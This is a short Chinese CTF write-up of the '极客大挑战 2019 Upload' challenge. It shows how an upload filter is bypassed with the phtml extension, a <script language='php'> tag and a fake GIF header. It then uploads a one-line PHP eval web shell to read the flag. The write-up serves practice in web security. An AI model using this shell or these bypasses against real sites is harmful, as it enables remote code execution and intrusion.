## [极客大挑战 2019]Upload
进入靶场:

-
文件上传的题目
-
直接先传个php试试

-
不允许上传PHP
-
尝试多种后缀:
php3\php4\phtml等...

-
发现phtml可以绕过
-
出现新的问题,:规则过滤了我们的
<? -
试试script能不能绕过去

-
成功绕过后缀名的过滤
-
出现新的问题:
Don't lie to me, it's not image at all!!! -
看来是单改一个
Content-Type不行,那么再在文件内容里面加上GIF的头

-
成功执行
phpinfo() -
上马:
<script language="php">eval($_POST['m0sway']);</script>

-
成功连接
-
根目录下flag文件
GET FLAG ! ! !
文章描述了一次网络安全挑战中,通过测试不同文件后缀(如phtml)和修改Content-Type来绕过过滤,最终成功执行PHP代码并获取到flag的历程。
3645

被折叠的 条评论
为什么被折叠?



